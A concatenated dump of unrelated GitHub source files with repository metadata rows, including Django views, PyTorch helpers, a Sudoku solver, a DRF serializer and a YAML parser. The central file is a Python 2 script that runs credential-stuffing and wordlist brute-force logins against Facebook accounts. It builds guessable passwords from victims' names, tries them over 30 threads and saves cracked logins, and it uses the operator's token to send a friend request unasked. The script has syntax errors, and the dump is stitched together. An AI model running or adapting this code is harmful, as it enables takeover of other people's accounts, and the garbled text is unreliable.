company = request.user.company.company_name
except Exception as e:
print(e)
return HttpResponseRedirect(reverse('sys_station'))
if company and StationInfo.objects.filter(id=station_id, company__company_name=company):
try:
sys_settings = SystemSettings.objects.get(station_id=station_id,
station__company__company_name=company)
except SystemSettings.DoesNotExist:
sys_settings = SystemSettings.objects.create(station_id=station_id, water_min_level=0,
water_max_level=0, flow_min_level=0, flow_max_level=0,
deviate_value=0, volt_value=0, is_alarm=0)
return render(request, 'sys_settings.html', {"sys_settings": sys_settings})
else:
return HttpResponseRedirect(reverse('sys_station'))
def post(self, request, station_id):
sys_id = request.POST.get('sys_id')
print(sys_id)
if sys_id:
sys_settings = SystemSettings.objects.get(id=sys_id)
settings_form = SystemSettingsForm(request.POST, instance=sys_settings)
if settings_form.is_valid():
settings_form.save()
create_history_record(request.user, "修改系统设置")
return JsonResponse({"status": "success", "msg": "修改设置成功"})
else:
print(settings_form.errors)
return JsonResponse({
"status": "fail",
"msg": "修改设置成功",
})
else:
settings_form = SystemSettingsForm(request.POST)
if settings_form.is_valid():
settings_form.save()
create_history_record(request.user, "设置系统设置")
return JsonResponse({"status": "success", "msg": "设置成功"})
else:
print(settings_form.errors)
return JsonResponse({
"status": "fail",
"msg": "设置失败",
})
| [
"569578851@qq.com"
] | 569578851@qq.com |
703e0d49a29534beecd05b5fb4f1fd007feb877c | c820df8279e788e88a2e5476a781228bf15075ad | /RoHii | 2fa6294c4d68a5ea5f89f70bbe5c4d4555094f8f | [] | no_license | ROoHii/RoHll | c7ead0fcdaf8477029725e212f11099bff2713d7 | 3103bbde23f36763ecfc0171f03ea7e8831c0daf | refs/heads/main | 2023-01-03T04:35:59.108306 | 2020-10-30T09:19:29 | 2020-10-30T09:19:29 | 308,580,474 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,316 | #!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """
\033[1;91m 🤒💋💉———————————————————————————————💋🤒💉
\033[1;96m ╭━━━╮╱╱╭╮╱╭╮
\033[1;96m ┃╭━╮┃╱╱┃┃╱┃┃⚡
\033[1;96m ┃╰━╯┣━━┫╰━╯┣┳╮
\033[1;96m ┃╭╮╭┫╭╮┃╭━╮┣╋┫|
\033[1;96m ┃┃┃╰┫╰╯┃┃╱┃┃┃┃
\033[1;96m ╰╯╰━┻━━┻╯╱╰┻┻╯|
\033[1;96m | |
\033[1;96m |_| RoHii UpDAtED 0.3
\033[1;91m 💉🤒💋———————————————————————————————💉🤒💋
"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;97m ╭━━━╮╱╱╭╮╱╭╮
\033[1;92m ┃╭━╮┃╱╱┃┃╱┃┃Updated✔
\033[1;97m ┃╰━╯┣━━┫╰━╯┣┳╮
\033[1;92m ┃╭╮╭┫╭╮┃╭━╮┣╋┫
\033[1;97m ┃┃┃╰┫╰╯┃┃╱┃┃┃┃
\033[1;97m ╰╯╰━┻━━┻╯╱╰┻┻╯
"""
jalan("\033[1;97m•◈•───────•◈ RoHii sHuNa''z kA sHuNa" •◈•───────•◈•")
jalan("\033[1;96m•◈• _____ _____ ______ ______ _____ _____ ")
jalan("\033[1;96m•◈• ______ ______ __ __ __ __ ")
jalan("\033[1;97m•◈• /\ == \ /\ __ \ /\ \_\ \ /\ \ /\ \ ")
jalan("\033[1;96m•◈• \ \ __< \ \ \/\ \ \ \ __ \ \ \ \ \ \ \ ")
jalan("\033[1;96m•◈• \ \_\ \_\ \ \_____\ \ \_\ \_\ \ \_\ \ \_\ ")
jalan("\033[1;96m•◈• \/_/ /_/ \/_____/ \/_/\/_/ \/_/ \/_/|")
jalan(" \033[1;91m INDAIN USERZ USE ANY PROXY ")
jalan(" \033[1;91m WIFI USERZ USE ANY PROXY ")
jalan(" \033[1;93m Welcome to RoHii Creations ")
jalan("\033[1;97m•◈•──────────•◈•\033[1;96mBlacktiger\033[1;96m•◈•──────────•◈•")
CorrectUsername = "rohii"
CorrectPassword = "rohii"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;97mUSER ID \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;97mPASWORD \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
print "Wrong Password"
os.system('xdg-open https://www.youtube.com/channel/UCd77mzzS0Cmd9oCScb8VRLw
else:
print "Wrong Username"
os.system('xdg-open https://www.youtube.com/channel/UCd77mzzS0Cmd9oCScb8VRLw
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 50*"\033[1;96m▪"
print(' \033[1;97m[◉] \x1b[1;96mLogin New Fresh Account \033[1;97m[◉]' )
id = raw_input(' \033[1;97m[◉] \033[1;97mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input(' \033[1;97m[◉] \033[1;97mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\x1b[1;36;40m[✓] Login Successful...'
os.system('xdg-open https://www.youtube.com/channel/UCsdJQbRf0xpvwaDu1rqgJuA')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;97m[!] There is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;97m[!] Your Account is on Checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;97mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;97m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print"\033[1;97mYour Account is on Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;97mThere is no internet connection"
keluar()
os.system("clear")
print logo
print " \033[1;36;40m ╔═════════════════════════════════╗"
print " \033[1;36;40m ║\033[1;32;40m[*] Name\033[1;32;40m: "+nama+" \033[1;36;40m║"
print " \033[1;36;40m ║\033[1;34;40m[*] ID \033[1;34;40m: "+id+" \033[1;36;40m║"
print " \033[1;36;40m ║\033[1;34;40m[*] Subs\033[1;34;40m: "+sub+" \033[1;36;40m║"
print " \033[1;36;40m ╚═════════════════════════════════╝"
print "\033[1;32;40m[1] \033[1;33;40m══Start Hack3ing"
print "\033[1;32;40m[2] \033[1;33;40m══Update Aahil"
print "\033[1;32;40m[0] \033[1;33;40m══Log out"
pilih()
def pilih():
unikers = raw_input("\n\033[1;31;40m>>> \033[1;35;40m")
if unikers =="":
print "\033[1;97mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
os.system('clear')
print logo
print " \033[1;36;40m●════════════════════════◄►════════════════════════●\n"
os.system('git pull origin master')
raw_input('\n\033[1;97m[ \033[1;97mBack \033[1;97m]')
menu()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;97mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;97mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print "\x1b[1;32;40m[1] \033[1;33;40m══Hack From Friend List"
print "\x1b[1;32;40m[2] \033[1;33;40m══Hack From Public ID"
print "\x1b[1;32;40m[3] \033[1;33;40m══Hack Bruteforce"
print "\x1b[1;32;40m[4] \033[1;33;40m══Hack From File"
print "\x1b[1;32;40m[0] \033[1;33;40m══Back RoHii''
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;31;40m>>> \033[1;97m")
if peak =="":
print "\033[1;97mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
jalan('\033[1;97m[✺] Getting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
idt = raw_input("\033[1;97m[*] Enter ID : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;31;40m[✺] Name : "+op["name"]
except KeyError:
print"\033[1;97m[✺] ID Not Found!"
raw_input("\n\033[1;97m[\033[1;97mBack\033[1;97m]")
super()
print"\033[1;35;40m[✺] Getting IDs..."
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
brute()
elif peak =="4":
os.system('clear')
print logo
try:
idlist = raw_input('\033[1;97m[+] \033[1;97mEnter the file name \033[1;97m: \033[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;35;40m[!] \x1b[1;35;40mFile not found'
raw_input('\n\x1b[1;35;40m[ \x1b[1;35;40mExit \x1b[1;35;40m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;97mFill in correctly"
pilih_super()
print "\033[1;36;40m[✺] Total IDs : \033[1;97m"+str(len(id))
jalan('\033[1;34;40m[✺] Please Wait...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;32;40m[✺] Cloning\033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;97m ❈ \033[1;97mTo Stop Process Press CTRL+Z \033[1;97m ❈"
print " \033[1;31;48m●💋══════════════════◄►══════════════════💋●"
jalan(' \033[1;97mRoHii start cloning Wait...')
print " \033[1;36;48m ●💋══════════════════◄►══════════════════💋●"
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \033[1;97m | \033[1;97m ' + pass1 + ' 👽 ' + b['name']
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass1 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \033[1;97m | \033[1;97m ' + pass2 + ' 👽 ' + b['name']
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass2 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \033[1;97m | \033[1;97m ' + pass3 + ' 👽 ' + b['name']
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass3 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass4 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \033[1;97m | \033[1;97m ' + pass4 + ' 👽 ' + b['name']
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass4 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = '786786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass5 + ' 👽 ' + b['name']
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass5 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass6 + ' 👽 ' + b['name']
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass6 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
pass7 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass7 + ' 👽 ' + b['name']
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass7 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\033[1;31;40m[✓] Process Has Been Completed\033[1;97m....'
print "\033[1;32;40m[+] Total OK/\033[1;97mCP \033[1;97m: \033[1;97m"+str(len(oks))+"\033[1;31;40m/\033[1;36;40m"+str(len(cekpoint))
print '\033[1;34;40m[+] CP File Has Been Saved : save/cp.txt'
print """
\033[1;31;40m ●════════════════════════◄►════════════════════════●
"""
raw_input("\n\033[1;97m[\033[1;97mExit\033[1;97m]")
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\033[1;97m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '\033[1;31;40m ●════════════════════════◄►════════════════════════●'
try:
email = raw_input('\033[1;97m[+] \033[1;97mID\033[1;97m/\033[1;97mEmail \033[1;97mTarget \033[1;97m:\033[1;97m ')
passw = raw_input('\033[1;97m[+] \033[1;97mWordlist \033[1;97mext(list.txt) \033[1;97m: \033[1;97m')
total = open(passw, 'r')
total = total.readlines()
print '\033[1;31;40m ●════════════════════════◄►════════════════════════●'
print '\033[1;97m[\033[1;97m\xe2\x9c\x93\033[1;97m] \033[1;97mTarget \033[1;97m:\033[1;97m ' + email
print '\033[1;97m[+] \033[1;97mTotal\033[1;97m ' + str(len(total)) + ' \033[1;97mPassword'
jalan('\033[1;97m[\xe2\x9c\xba] \033[1;97mPlease wait \033[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\033[1;97m[\033[1;97m\xe2\x9c\xb8\033[1;97m] \033[1;97mTry \033[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\033[1;97m[+] \033[1;97mFounded.'
print 52 * '\033[1;97m\xe2\x95\x90'
print '\033[1;97m[\xe2\x9e\xb9] \033[1;97mUsername \033[1;97m:\033[1;97m ' + email
print '\033[1;97m[\xe2\x9e\xb9] \033[1;97mPassword \033[1;97m:\033[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\033[1;97m[+] \033[1;97mFounded.'
print "\033[1;36;40m ●════════════════════════◄►════════════════════════●"
print '\033[1;97m[!] \033[1;97mAccount Maybe Checkpoint'
print '\033[1;97m[\xe2\x9e\xb9] \033[1;97mUsername \033[1;97m:\033[1;97m ' + email
print '\033[1;97m[\xe2\x9e\xb9] \033[1;97mPassword \033[1;97m:\033[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\033[1;97m[!] Connection Error'
time.sleep(1)
except IOError:
print '\033[1;97m[!] File not found...'
print """\n\033[1;97m[!] \033[1;97mLooks like you don't have a wordlist"""
super()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | ROoHii.noreply@github.com | |
6caf2d70cd85ad7bafa882404400345e53f618be | b32caab19ed8fac30cf48e226441602924f1ed1f | /utils.py | 7377d3f4e33fc68c4a0475198a785291cd1657bf | [] | no_license | Wooyong-Choi/attn_style_transfer | be38bc332580b7e5d53aa4096a9b63369d6dadcc | f25bb4860df290b2c89e3c3916aa671380344bf8 | refs/heads/master | 2020-04-26T12:50:34.517368 | 2019-03-08T15:16:54 | 2019-03-08T15:16:54 | 173,562,454 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 694 | py | import torch
def sequence_mask(lengths, hops, max_len=None):
"""
Creates a boolean mask from sequence lengths.
"""
batch_size = lengths.numel()
max_len = max_len or lengths.max()
return (torch.arange(0, max_len)
.type_as(lengths)
.to(lengths.device)
.repeat(batch_size, 1)
.lt(lengths.unsqueeze(1))
.repeat(hops, 1, 1)
.transpose(0, 1))
def frobenius(matrix):
# matrix: (bs, r, r)
bs = matrix.size(0)
ret = torch.sum((matrix ** 2), 1) # (bs, r)
ret = torch.sum(ret, 1).squeeze() + 1e-10 # #(bs,), support underflow
ret = ret ** 0.5
ret = torch.sum(ret) / bs
return ret | [
"whdrmt12@gmail.com"
] | whdrmt12@gmail.com |
ccefa8887b00d5bd6d1144590d3eed54c5d81ae5 | 5ffa1d127fc8dfdad5f7cc5abb3dff447b76a749 | /Sudoku_Python_Shell/src/ConstraintNetwork.py | 1e0416953102934da7e0dba348a8de494be62f09 | [] | no_license | APM150/Sudoku-AI | b5b904f4e53bed43f1cf0af45f331edf72dd585a | 4f944c34e41d3f9d83a37947ee3d6b98e9c8b6a1 | refs/heads/master | 2022-11-23T18:21:14.981549 | 2020-07-27T01:34:36 | 2020-07-27T01:34:36 | 279,459,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,983 | py | import Variable
import Constraint
import SudokuBoard
from math import floor
"""
CSP representation of the problem. Contains the variables, constraints, and
many helpful accessors.
"""
class ConstraintNetwork:
# ==================================================================
# Constructors
# ==================================================================
def __init__ ( self, sboard = None ):
self.constraints = []
self.variables = []
if sboard != None:
board = sboard.board
temp = []
value = 0
for i in range(sboard.N):
for j in range(sboard.N):
value = board[i][j]
domain = []
if value == 0:
d = 1
while d <= sboard.N:
domain.append(d)
d += 1
else:
domain.append(value)
block = int(((floor(i/sboard.p) * sboard.p) + floor(j/sboard.q)))
temp.append(Variable.Variable(domain,i,j,block))
rows = dict()
cols = dict()
blocks = dict()
for v in temp:
row = v.row
col = v.col
block = v.block
if not (row in rows.keys()):
rows[row] = []
if not (col in cols.keys()):
cols[col] = []
if not (block in blocks.keys()):
blocks[block] = []
rows[row].append(v)
cols[col].append(v)
blocks[block].append(v)
for v in temp:
self.addVariable(v)
for e in rows:
c = Constraint.Constraint()
for v in rows[e]:
c.addVariable(v)
self.addConstraint(c)
for e in cols:
c = Constraint.Constraint()
for v in cols[e]:
c.addVariable(v)
self.addConstraint(c)
for e in blocks:
c = Constraint.Constraint()
for v in blocks[e]:
c.addVariable(v)
self.addConstraint(c)
# ==================================================================
# Modifiers
# ==================================================================
def addConstraint ( self, c ):
if c not in self.constraints:
self.constraints.append( c )
def addVariable ( self, v ):
if v not in self.variables:
self.variables.append( v )
# ==================================================================
# Accessors
# ==================================================================
def getConstraints ( self ):
return self.constraints
def getVariables ( self ):
return self.variables
# Returns all variables that share a constraint with v
def getNeighborsOfVariable ( self, v ):
neighbors = set()
for c in self.constraints:
if c.contains( v ):
for x in c.vars:
neighbors.add( x )
neighbors.remove( v )
return list( neighbors )
# Returns true is every constraint is consistent
def isConsistent ( self ):
for c in self.constraints:
if not c.isConsistent():
return False
return True
# Returns a list of constraints that contains v
def getConstraintsContainingVariable ( self, v ):
"""
@param v variable to check
@return list of constraints that contains v
"""
outList = []
for c in self.constraints:
if c.contains( v ):
outList.append( c )
return outList
"""
Returns the constraints that contain variables whose domains were
modified since the last call to this method.
After getting the constraints, it will reset each variable to
unmodified
Note* The first call to this method returns the constraints containing
the initialized variables.
"""
def getModifiedConstraints ( self ):
mConstraints = []
for c in self.constraints:
if c.isModified():
mConstraints.append( c )
for v in self.variables:
v.setModified( False )
return mConstraints
# ==================================================================
# String Representation
# ==================================================================
def __str__ ( self ):
output = str(len(self.variables)) + " Variables: {"
delim = ""
for v in self.variables:
output += delim + v.name
delim = ","
output += "}"
output += "\n" + str(len(self.constraints)) + " Constraints:"
delim = "\n"
for c in self.constraints:
output += delim + str(c)
output += "\n"
for v in self.variables:
output += str(v) + "\n"
return output
# ==================================================================
# Sudoku Board Representation
# ==================================================================
def toSudokuBoard ( self, p, q ):
n = p*q
board = [[ 0 for j in range( n )] for i in range( n )]
row = 0
col = 0
for v in self.variables:
board[row][col] = v.getAssignment()
col += 1
if col == n:
col = 0
row += 1
return SudokuBoard.SudokuBoard( p, q, board = board ) | [
"xujohnathan021@163.com"
] | xujohnathan021@163.com |
543836db6a97bcf00b8154a8dffb531a23679736 | 32d031f9af37ff70505359f8add5fc44e645fd15 | /api/serializers.py | eb1b1b02439906890bee85ff94370717409d7eab | [] | no_license | Kirom/MovieRaterApi | cfc4851a80f9429e2c866d271638c234cddfaa40 | 3a904afe6813f692cd9f113e0ac6206c1d47434d | refs/heads/master | 2022-11-22T00:46:08.765712 | 2020-07-21T12:41:57 | 2020-07-21T12:41:57 | 277,317,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 858 | py | from django.contrib.auth.models import User
from rest_framework import serializers
from rest_framework.authtoken.models import Token
from api.models import Movie, Rating
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('id', 'username', 'password')
extra_kwargs = {'password': {'write_only': True, 'required': True}}
def create(self, validated_data):
user = User.objects.create_user(**validated_data)
Token.objects.create(user=user)
return user
class MovieSerializer(serializers.ModelSerializer):
class Meta:
model = Movie
fields = ('id', 'title', 'description', 'num_of_ratings', 'avg_rating')
class RatingSerializer(serializers.ModelSerializer):
class Meta:
model = Rating
fields = ('id', 'movie', 'user', 'stars')
| [
"Vityamirono@yandex.ru"
] | Vityamirono@yandex.ru |
31f0668321cda6ff20e8d3f7aa3f9f8b8d439fd4 | af6c3a769f3abfd3fd65cca1fa7f713d175c968f | /parse_cf_yaml_files.py | 041aa7e2e4ee1a6c5559e5fc95372b8c21c06f3c | [] | no_license | vigneshkarthy3/Automation_Scripts | b72d8041a036314e23f1509ca9f186ae7d447683 | 751ef13b70980391ad16fdc9820f5e3f8e742f0b | refs/heads/master | 2022-12-28T20:34:50.246083 | 2022-12-18T12:35:08 | 2022-12-18T12:35:08 | 294,160,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | import os
import yaml,glob
os.chdir(r'testing')
resultdir="result"
files = glob.glob("*.yaml")
for file in files:
resultfile=resultdir+"\\"+file
new_dict={}
with open(file) as f:
docs=yaml.load(f, Loader=yaml.FullLoader)
for each in docs["applications"]:
try:
new_dict["appname"]=each["name"]
new_dict["memory"]=each["memory"]
new_dict["instance"]=each["instances"]
except KeyError:
print("Key-error ",file)
with open(resultfile,'w') as newfile:
data = yaml.dump(new_dict, newfile,default_flow_style=False, sort_keys=False) | [
"vigneshkarthy3@gmail.com"
] | vigneshkarthy3@gmail.com |
db6f9e619cc3eb6af96cb90589f32f741554459c | c78ce4f66cc964c230ad60fbf2ced6b4811eab89 | /0x10-python-network_0/6-peak.py | ab8163dbefd2215b422669954178d075b0be06a2 | [] | no_license | jebichii/holbertonschool-higher_level_programming-1 | 89026557909851dd775ae355f036db89ebd9adb9 | 741953aa479af90e8eac6f1315415eff4a20224f | refs/heads/master | 2023-03-15T14:58:27.062528 | 2020-06-11T07:21:23 | 2020-06-11T07:21:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 661 | py | #!/usr/bin/python3
"""
Provides a function to find a peak element in an unsorted list of integers
"""
def find_peak(integers):
"""
Finds a peak element in an unsorted list of integers
"""
if not integers:
return None
if len(integers) == 1:
return integers[0]
if len(integers) == 2:
return integers[0] if integers[0] > integers[1] else integers[1]
midpoint = len(integers) // 2
